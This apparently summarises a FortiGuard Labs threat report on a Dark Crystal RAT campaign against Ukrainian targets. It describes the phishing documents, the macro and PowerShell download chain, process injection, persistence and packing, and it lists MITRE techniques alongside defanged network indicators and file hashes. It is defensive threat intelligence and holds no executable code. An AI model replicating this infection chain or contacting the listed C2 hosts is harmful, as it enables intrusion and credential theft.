Threat Research

Ukraine Targeted by Dark Crystal RAT (DCRat) | FortiGuard Labs

Securonix

Two Ukrainian targets were hit by emails delivering malicious documents that leveraged a Follina-like vulnerability and malicious macros to drop a DCRat variant. FortiGuard Labs notes the campaign revolves around Dark Crystal RAT (DCRat) with multi-stage infection, evasion techniques, and data-exfiltration goals. #DCRat #Follina

Keypoints

  • Ukraine-focused campaign via emails containing a malicious document named “LIST_of_links_interactive_maps.docx” exploiting a then zero-day vulnerability (Follina) in MSDT.
  • FortiGuard Labs also observed a related file with the same Ukrainian filename in Excel (.xlsx) format that uses malicious macros to trigger the payload.
  • Macros drop and execute a batch (new.bat) which runs PowerShell to fetch MSDriverLoader.exe, then MSDriverMonitor.exe, which is the DCRat variant.
  • DCRat (Dark Crystal RAT) is dropped, dropped as DllHelper.exe, and injected into InstallUtil.exe for persistence and execution.
  • The malware uses a multi-stage packer and anti-analysis checks (e.g., Fortinet and TEQUILABOOMBOOM names) to hinder detection, including a fake MZ header in a second layer.
  • C2 communication includes star-cz.ddns.net and IP 103.27.202.127; DCRat’s capabilities include keylogging, browser credential theft, screenshots, and data exfiltration with plugin support.

MITRE Techniques

  • [T1566.001] Phishing – Delivery via email with malicious attachment. Quote: [‘targeted with emails containing a malicious document “LIST_of_links_interactive_maps.docx”’]
  • [T1059.005] Visual Basic – Malicious macros in Excel (.xlsm) enabling execution. Quote: [‘Excel (xlsx) format and contains malicious macros…’]
  • [T1059.001] PowerShell – Macro drops and executes PowerShell code to download payload. Quote: [‘PowerShell code that downloads MSDriverLoader.exe’]
  • [T1105] Ingress Tool Transfer – Downloads MSDriverLoader.exe from a remote server. Quote: [‘downloads MSDriverLoader.exe from 72[.]167[.]223[.]219’]
  • [T1055] Process Injection – DCRat code injected into a legitimate Windows process (InstallUtil.exe). Quote: [‘inject the DCRat code into a legitimate Windows .NET process, InstallUtil.exe’]
  • [T1053.005] Scheduled Task – Creates a scheduled task (COMSurrogate) to persistently run DllHelper.exe. Quote: [‘scheduled task executes DllHelper.exe every time a user logs onto the system’]
  • [T1071.004] DNS – C2 communications initiated via DNS and domain hardening. Quote: [‘Initial DNS request to “star-cz[.]ddns[.]net” and subsequent C2 traffic.’]
  • [T1056.001] Keylogging – Data collection via keystrokes. Quote: [‘Keylogging’]
  • [T1113] Screen Capture – Taking screenshots. Quote: [‘Taking screenshots’]
  • [T1555.003] Credentials from Web Browsers – Theft of cookies and browser credentials. Quote: [‘Stealing cookies, passwords, and form contents from installed web browsers’]
  • [T1041] Exfiltration – Exfiltration of collected data to C2. Quote: [‘The primary focus of DCRat is data exfiltration’]
  • [T1027] Obfuscated/Compressed Files and Information – Multi-layer packer with deceptive headers to hinder analysis. Quote: [‘packers… fake MZ header… steganography’]
  • [T1562.001] Impair Defenses – Anti-analysis checks (Fortinet, TEQUILABOOMBOOM) during unpacking. Quote: [‘a lot of spaghetti code… computer names… “Fortinet” and “TEQUILABOOMBOOM”‘]

Indicators of Compromise

  • [File IOCs] – 03700E0D02A6A1D76ECAA4D8307E40F76E07284646B3C45693054996F2E643D7, 24811E849A7A0E73788BC893BED81B88405883EB9114557EACD26A90C2A81C29, C84BBFCE14FDC65C6E738CE1196D40066C87E58F443E23266D3B9E542B8A583E
  • [Network IOCs] – 72[.]167[.]223[.]219/MSDriverLoader.exe, 203[.]96[.]191[.]70/MSDriverMonitor.exe, star-cz[.]ddns[.]net, 103[.]27[.]202[.]127

Read more: https://www.fortinet.com/blog/threat-research/ukraine-targeted-by-dark-crystal-rat